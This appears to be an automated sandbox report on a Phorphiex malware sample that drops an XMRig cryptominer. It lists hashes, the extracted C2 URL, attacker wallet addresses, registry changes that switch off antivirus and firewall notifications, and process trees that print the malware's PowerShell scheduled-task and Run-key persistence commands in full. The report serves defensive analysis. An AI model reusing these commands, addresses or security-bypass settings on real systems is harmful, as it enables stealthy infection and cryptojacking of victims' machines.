Overview
overview
10Static
static
101c50e838ff...8c.exe
windows7-x64
81c50e838ff...8c.exe
windows10-2004-x64
81d3c6d6b27...34.exe
windows7-x64
101d3c6d6b27...34.exe
windows10-2004-x64
1022f524abc9...92.exe
windows7-x64
1022f524abc9...92.exe
windows10-2004-x64
103759265786...d0.exe
windows7-x64
83759265786...d0.exe
windows10-2004-x64
839c853575c...e3.exe
windows7-x64
1039c853575c...e3.exe
windows10-2004-x64
106969c45198...dc.exe
windows7-x64
86969c45198...dc.exe
windows10-2004-x64
896c5607aa1...7a.exe
windows7-x64
896c5607aa1...7a.exe
windows10-2004-x64
8a8d0ac5762...96.exe
windows7-x64
10a8d0ac5762...96.exe
windows10-2004-x64
10c86e66ff92...5d.exe
windows7-x64
10c86e66ff92...5d.exe
windows10-2004-x64
10fca1bb147c...66.exe
windows7-x64
1fca1bb147c...66.exe
windows10-2004-x64
7Analysis
-
max time kernel
151s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
28-09-2022 09:11
Behavioral task
behavioral1
Sample
1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288c.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288c.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral3
Sample
1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334.exe
Resource
win7-20220901-en
Behavioral task
behavioral4
Sample
1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral5
Sample
22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092.exe
Resource
win7-20220812-en
Behavioral task
behavioral6
Sample
22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral7
Sample
3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0.exe
Resource
win7-20220901-en
Behavioral task
behavioral8
Sample
3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral9
Sample
39c853575cbe6aa8343e8616cfc22c2dfdad567f78b5aee8e65f38423ebe10e3.exe
Resource
win7-20220812-en
Behavioral task
behavioral10
Sample
39c853575cbe6aa8343e8616cfc22c2dfdad567f78b5aee8e65f38423ebe10e3.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral11
Sample
6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dc.exe
Resource
win7-20220901-en
Behavioral task
behavioral12
Sample
6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dc.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral13
Sample
96c5607aa1a1082ff6659842855fe584e1467a2119de3c017ff20b7c317adf7a.exe
Resource
win7-20220812-en
Behavioral task
behavioral14
Sample
96c5607aa1a1082ff6659842855fe584e1467a2119de3c017ff20b7c317adf7a.exe
Resource
win10v2004-20220901-en
Behavioral task
behavioral15
Sample
a8d0ac5762f61683d7cbcbfc53e0b650e632625d7ffabf08b45986908891ee96.exe
Resource
win7-20220812-en
Behavioral task
behavioral16
Sample
a8d0ac5762f61683d7cbcbfc53e0b650e632625d7ffabf08b45986908891ee96.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral17
Sample
c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe
Resource
win7-20220812-en
Behavioral task
behavioral18
Sample
c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe
Resource
win10v2004-20220901-en
Behavioral task
behavioral19
Sample
fca1bb147cee65edf9ef821063fe3899d5ab3da1ca5310c9efe9913204675366.exe
Resource
win7-20220812-en
Behavioral task
behavioral20
Sample
fca1bb147cee65edf9ef821063fe3899d5ab3da1ca5310c9efe9913204675366.exe
Resource
win10v2004-20220812-en
General
-
Target
1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334.exe
-
Size
76KB
-
MD5
bd280f51fc7e46a3f9470713f5f859cc
-
SHA1
ed748025627617facd90eaad22c36687819f7535
-
SHA256
1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334
-
SHA512
b2c7aa0f9dffda55c078570d6ea51490ef5c5e13c1e8dccab7f0f5e324d785e3610e69a2f26d897bbd82ca74b4372447f838cc1296598faed4d9ddc45013bbc2
-
SSDEEP
1536:d3Mz8teK4zdEEP7ACU5wvclRSJytpKHaHlt5F92V:mwoKIP7q+vclR/tp3Ft5F92
Malware Config
Extracted
phorphiex
http://185.215.113.84/twizt/
13dJT8HaqHG3SzwEHN351NKpZHjT51LUMioPeZCuYFMn6Em2
1AFyjUHBU47bKeWD3Yv9vxFvfQCNFVhEB1
3PLCWMHvHvUKmzNKvrNxRHcpBBt841bLLRm
qraj0r42vag30v888rxrv23us6n9mwqzxqmanzrjzz
XdpMAtREQP2GiJPnhECJE17Yo47kqwxE2g
DAd39Hg29o3hXTXkCp867rWZ82QtYemBr1
0x7acBe663481E7cAB6C7b22af594A1Fa5553ddA5f
LVSQJj6WFnMzAFDZLidL19hCtTtJu1WNHy
rsJ93nxUfY9p5a1g8ZYd1w1YsHdVP3tSn1
TXGiKCawSp4VEYnXC4Eyvz8gVugh3ibZjr
t1eAsZic54jTo4V4DRPWMN4oLgSzsSSYxcw
AHZnFT4zfKU59R811DCthwxBPKuRqG2ES1
bitcoincash:qraj0r42vag30v888rxrv23us6n9mwqzxqmanzrjzz
4AtjkCVKbtEC3UEN77SQHuH9i1XkzNiRi5VCbA2XGsJh46nJSXfGQn4GjLuupCqmC57Lo7LvKmFUyRfhtJSvKvuw3h9ReKK
GABBG3OBFC3JLJEXMFEKJMMHANGFWVPTPKUJSVOMZZGQO522AXGL7Q3P
GMinVxCfyuHFUBiuuWuaWkUBWgN1kgowfsNzjjuad7W9
bnb16yfddrq3325xuqh3070tlqsr5gr74jun7zefgz
bc1qvdu6nyvrppjtshy7rgfpkl74hkklj7plavr8je
Signatures
-
Processes:
winopdvcs.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" winopdvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" winopdvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" winopdvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" winopdvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" winopdvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" winopdvcs.exe -
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule behavioral4/memory/3932-161-0x00007FF6D7F20000-0x00007FF6D8714000-memory.dmp xmrig behavioral4/memory/3932-162-0x00007FF6D7F20000-0x00007FF6D8714000-memory.dmp xmrig -
Blocklisted process makes network request 8 IoCs
Processes:
cmd.exeflow pid process 59 3932 cmd.exe 65 3932 cmd.exe 68 3932 cmd.exe 71 3932 cmd.exe 74 3932 cmd.exe 76 3932 cmd.exe 80 3932 cmd.exe 83 3932 cmd.exe -
Downloads MZ/PE file
-
Executes dropped EXE 4 IoCs
Processes:
winopdvcs.exe2546213664.exe3433215875.exeupdater.exepid process 2624 winopdvcs.exe 1152 2546213664.exe 1320 3433215875.exe 2200 updater.exe -
Processes:
resource yara_rule behavioral4/memory/3932-161-0x00007FF6D7F20000-0x00007FF6D8714000-memory.dmp upx behavioral4/memory/3932-162-0x00007FF6D7F20000-0x00007FF6D8714000-memory.dmp upx -
Processes:
winopdvcs.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" winopdvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" winopdvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" winopdvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" winopdvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" winopdvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" winopdvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" winopdvcs.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\winopdvcs.exe" 1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
updater.exedescription pid process target process PID 2200 set thread context of 3932 2200 updater.exe cmd.exe -
Drops file in Windows directory 2 IoCs
Processes:
1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334.exedescription ioc process File opened for modification C:\Windows\winopdvcs.exe 1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334.exe File created C:\Windows\winopdvcs.exe 1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 4144 powershell.exe 4144 powershell.exe 820 powershell.exe 820 powershell.exe 1648 powershell.exe 1648 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 4144 powershell.exe Token: SeIncreaseQuotaPrivilege 4144 powershell.exe Token: SeSecurityPrivilege 4144 powershell.exe Token: SeTakeOwnershipPrivilege 4144 powershell.exe Token: SeLoadDriverPrivilege 4144 powershell.exe Token: SeSystemProfilePrivilege 4144 powershell.exe Token: SeSystemtimePrivilege 4144 powershell.exe Token: SeProfSingleProcessPrivilege 4144 powershell.exe Token: SeIncBasePriorityPrivilege 4144 powershell.exe Token: SeCreatePagefilePrivilege 4144 powershell.exe Token: SeBackupPrivilege 4144 powershell.exe Token: SeRestorePrivilege 4144 powershell.exe Token: SeShutdownPrivilege 4144 powershell.exe Token: SeDebugPrivilege 4144 powershell.exe Token: SeSystemEnvironmentPrivilege 4144 powershell.exe Token: SeRemoteShutdownPrivilege 4144 powershell.exe Token: SeUndockPrivilege 4144 powershell.exe Token: SeManageVolumePrivilege 4144 powershell.exe Token: 33 4144 powershell.exe Token: 34 4144 powershell.exe Token: 35 4144 powershell.exe Token: 36 4144 powershell.exe Token: SeIncreaseQuotaPrivilege 4144 powershell.exe Token: SeSecurityPrivilege 4144 powershell.exe Token: SeTakeOwnershipPrivilege 4144 powershell.exe Token: SeLoadDriverPrivilege 4144 powershell.exe Token: SeSystemProfilePrivilege 4144 powershell.exe Token: SeSystemtimePrivilege 4144 powershell.exe Token: SeProfSingleProcessPrivilege 4144 powershell.exe Token: SeIncBasePriorityPrivilege 4144 powershell.exe Token: SeCreatePagefilePrivilege 4144 powershell.exe Token: SeBackupPrivilege 4144 powershell.exe Token: SeRestorePrivilege 4144 powershell.exe Token: SeShutdownPrivilege 4144 powershell.exe Token: SeDebugPrivilege 4144 powershell.exe Token: SeSystemEnvironmentPrivilege 4144 powershell.exe Token: SeRemoteShutdownPrivilege 4144 powershell.exe Token: SeUndockPrivilege 4144 powershell.exe Token: SeManageVolumePrivilege 4144 powershell.exe Token: 33 4144 powershell.exe Token: 34 4144 powershell.exe Token: 35 4144 powershell.exe Token: 36 4144 powershell.exe Token: SeIncreaseQuotaPrivilege 4144 powershell.exe Token: SeSecurityPrivilege 4144 powershell.exe Token: SeTakeOwnershipPrivilege 4144 powershell.exe Token: SeLoadDriverPrivilege 4144 powershell.exe Token: SeSystemProfilePrivilege 4144 powershell.exe Token: SeSystemtimePrivilege 4144 powershell.exe Token: SeProfSingleProcessPrivilege 4144 powershell.exe Token: SeIncBasePriorityPrivilege 4144 powershell.exe Token: SeCreatePagefilePrivilege 4144 powershell.exe Token: SeBackupPrivilege 4144 powershell.exe Token: SeRestorePrivilege 4144 powershell.exe Token: SeShutdownPrivilege 4144 powershell.exe Token: SeDebugPrivilege 4144 powershell.exe Token: SeSystemEnvironmentPrivilege 4144 powershell.exe Token: SeRemoteShutdownPrivilege 4144 powershell.exe Token: SeUndockPrivilege 4144 powershell.exe Token: SeManageVolumePrivilege 4144 powershell.exe Token: 33 4144 powershell.exe Token: 34 4144 powershell.exe Token: 35 4144 powershell.exe Token: 36 4144 powershell.exe -
Suspicious use of WriteProcessMemory 23 IoCs
Processes:
1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334.exewinopdvcs.exe2546213664.exe3433215875.exepowershell.exeupdater.execmd.exedescription pid process target process PID 4260 wrote to memory of 2624 4260 1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334.exe winopdvcs.exe PID 4260 wrote to memory of 2624 4260 1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334.exe winopdvcs.exe PID 4260 wrote to memory of 2624 4260 1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334.exe winopdvcs.exe PID 2624 wrote to memory of 1152 2624 winopdvcs.exe 2546213664.exe PID 2624 wrote to memory of 1152 2624 winopdvcs.exe 2546213664.exe PID 2624 wrote to memory of 1152 2624 winopdvcs.exe 2546213664.exe PID 1152 wrote to memory of 1320 1152 2546213664.exe 3433215875.exe PID 1152 wrote to memory of 1320 1152 2546213664.exe 3433215875.exe PID 1320 wrote to memory of 4144 1320 3433215875.exe powershell.exe PID 1320 wrote to memory of 4144 1320 3433215875.exe powershell.exe PID 1320 wrote to memory of 820 1320 3433215875.exe powershell.exe PID 1320 wrote to memory of 820 1320 3433215875.exe powershell.exe PID 820 wrote to memory of 4640 820 powershell.exe schtasks.exe PID 820 wrote to memory of 4640 820 powershell.exe schtasks.exe PID 2200 wrote to memory of 1648 2200 updater.exe powershell.exe PID 2200 wrote to memory of 1648 2200 updater.exe powershell.exe PID 2200 wrote to memory of 3776 2200 updater.exe cmd.exe PID 2200 wrote to memory of 3776 2200 updater.exe cmd.exe PID 3776 wrote to memory of 3616 3776 cmd.exe WMIC.exe PID 3776 wrote to memory of 3616 3776 cmd.exe WMIC.exe PID 2200 wrote to memory of 3932 2200 updater.exe cmd.exe PID 2200 wrote to memory of 3932 2200 updater.exe cmd.exe PID 2200 wrote to memory of 3932 2200 updater.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334.exe"C:\Users\Admin\AppData\Local\Temp\1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334.exe"1⤵
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\winopdvcs.exeC:\Windows\winopdvcs.exe2⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\2546213664.exeC:\Users\Admin\AppData\Local\Temp\2546213664.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\3433215875.exeC:\Users\Admin\AppData\Local\Temp\3433215875.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#lipfordu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#oqazi#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC6⤵
-
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exeC:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#lipfordu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe mrcpapowlrrgcvjb 6E3sjfZq2rJQaxvLPmXgsEqPiBiBLmVqlQRiqAROwnq+r3PgsvOI5CPEjWBkfjMBWeIX+GdZdCENkRpNNWWuUuiiT0nhr8xABS5D2B/qge2fBy16M7G/el0gdMCErX4jNqcnUz2ARFIRcMCpcOiMWItfgkpYfgbwioV0ioLoGuNMU42qRMuIsqjDs2FXseGAy1L1fh1Re+jaH/pdMkIbkcsE1vSzYIpH8WyjqEMFAlci5CLdLe97i0VD0mpaS+Gd+daXi5rj++LAHgkUTDqtbVL59AFDJZ9WYwE1hVlCLXncC2+//LOROJeHXBaIJ7E+zEF1XB8rOli3v9a2WUYdKol3fQS1Z2oPF18nYGSur3scnVljXe+vL6dRgItNbPO72⤵
- Blocklisted process makes network request
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD500e7da020005370a518c26d5deb40691
SHA1389b34fdb01997f1de74a5a2be0ff656280c0432
SHA256a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe
SHA5129a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD557c0543153b3fdefc25f54368215ae49
SHA1faa7e4b52d54b98b6f5a3ddae91142098471fbaa
SHA25602601023870ac4c865e1a814771c56cd1e8c65f58cfbc1f995468cff334b861b
SHA512bfb9eeb7c4e1b166f7706803cc50f584fbdff6b2660ef84b2f56d56c6ede3c93b4f62ccce213c6cd638304f04a4ddb69fa4b96a947a8a8b30d5d9e19f3fc8dde
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5143a478fb47996f74bbbcdaa252b9e0b
SHA1288893a45c1c50f8245a32aa06dfb1ac2ff31c83
SHA2566d91b6cc49e12bf850b873bfd57f591a37fe1aef5ca6e2bc8855dc866abf479b
SHA512e7e2d235fc60e58fe10961515db7f1a667cc58268b8cd3066afa5e7e4de0b1217e3cb85fbe24230b3eb7ac94399fa42971772954a0c309d3cb9334b7a67f93d8
-
C:\Users\Admin\AppData\Local\Temp\2546213664.exeFilesize
6KB
MD5f99a026691957a1490c606890021a4db
SHA14eca65b16ce9b8284f3fc54344f8ae15b406b4e1
SHA256db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd
SHA512e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f
-
C:\Users\Admin\AppData\Local\Temp\2546213664.exeFilesize
6KB
MD5f99a026691957a1490c606890021a4db
SHA14eca65b16ce9b8284f3fc54344f8ae15b406b4e1
SHA256db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd
SHA512e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f
-
C:\Users\Admin\AppData\Local\Temp\3433215875.exeFilesize
2.2MB
MD5f6fd2a4333007f65beef7609077ec14d
SHA13740133e77fae5ee1c0ed1cb0493af5557e3562a
SHA256b2c7dfbe576c1962cd647917207e957d17dbe367c36dde071054f12beac68499
SHA51243c8b557b1bbfb353d4fe37d09c4dd94c7aaab9d9a6fda421144e40e81e2732df7dbd9faa67ca0e1779e787a8771fbcd9496dee2ae03530462910d1393e513d7
-
C:\Users\Admin\AppData\Local\Temp\3433215875.exeFilesize
2.2MB
MD5f6fd2a4333007f65beef7609077ec14d
SHA13740133e77fae5ee1c0ed1cb0493af5557e3562a
SHA256b2c7dfbe576c1962cd647917207e957d17dbe367c36dde071054f12beac68499
SHA51243c8b557b1bbfb353d4fe37d09c4dd94c7aaab9d9a6fda421144e40e81e2732df7dbd9faa67ca0e1779e787a8771fbcd9496dee2ae03530462910d1393e513d7
-
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exeFilesize
2.2MB
MD5d081ded7aeebd495ea24b5531168f315
SHA121db4bae653ece87474e7121a8b60d9fd08208c9
SHA2566e077c8a35fb28692230158cb9d80104cad9be31c06d64eb091c4cab81669d6a
SHA51245dd10bcf9bcd298060ddd6a9e8afc4a938d490db632d9b1ff2c1826975be35009b87d2d7b9a4e2869882aa41dafeb6aba23d8fd4c9d11996b5ffbc8a095c8a0
-
C:\Users\Admin\AppData\Roaming\Google\Libs\g.logFilesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
C:\Windows\winopdvcs.exeFilesize
76KB
MD5bd280f51fc7e46a3f9470713f5f859cc
SHA1ed748025627617facd90eaad22c36687819f7535
SHA2561d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334
SHA512b2c7aa0f9dffda55c078570d6ea51490ef5c5e13c1e8dccab7f0f5e324d785e3610e69a2f26d897bbd82ca74b4372447f838cc1296598faed4d9ddc45013bbc2
-
C:\Windows\winopdvcs.exeFilesize
76KB
MD5bd280f51fc7e46a3f9470713f5f859cc
SHA1ed748025627617facd90eaad22c36687819f7535
SHA2561d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334
SHA512b2c7aa0f9dffda55c078570d6ea51490ef5c5e13c1e8dccab7f0f5e324d785e3610e69a2f26d897bbd82ca74b4372447f838cc1296598faed4d9ddc45013bbc2
-
memory/820-150-0x00007FFBC87A0000-0x00007FFBC9261000-memory.dmpFilesize
10.8MB
-
memory/820-145-0x0000000000000000-mapping.dmp
-
memory/820-148-0x00007FFBC87A0000-0x00007FFBC9261000-memory.dmpFilesize
10.8MB
-
memory/1152-135-0x0000000000000000-mapping.dmp
-
memory/1320-138-0x0000000000000000-mapping.dmp
-
memory/1648-155-0x00007FFBC87A0000-0x00007FFBC9261000-memory.dmpFilesize
10.8MB
-
memory/1648-154-0x00007FFBC87A0000-0x00007FFBC9261000-memory.dmpFilesize
10.8MB
-
memory/1648-152-0x0000000000000000-mapping.dmp
-
memory/2624-132-0x0000000000000000-mapping.dmp
-
memory/3616-157-0x0000000000000000-mapping.dmp
-
memory/3776-156-0x0000000000000000-mapping.dmp
-
memory/3932-159-0x00007FF6D87125D0-mapping.dmp
-
memory/3932-160-0x0000022392D40000-0x0000022392D60000-memory.dmpFilesize
128KB
-
memory/3932-161-0x00007FF6D7F20000-0x00007FF6D8714000-memory.dmpFilesize
8.0MB
-
memory/3932-162-0x00007FF6D7F20000-0x00007FF6D8714000-memory.dmpFilesize
8.0MB
-
memory/4144-143-0x00007FFBC87A0000-0x00007FFBC9261000-memory.dmpFilesize
10.8MB
-
memory/4144-142-0x00007FFBC87A0000-0x00007FFBC9261000-memory.dmpFilesize
10.8MB
-
memory/4144-141-0x000002281EEA0000-0x000002281EEC2000-memory.dmpFilesize
136KB
-
memory/4144-140-0x0000000000000000-mapping.dmp
-
memory/4640-149-0x0000000000000000-mapping.dmp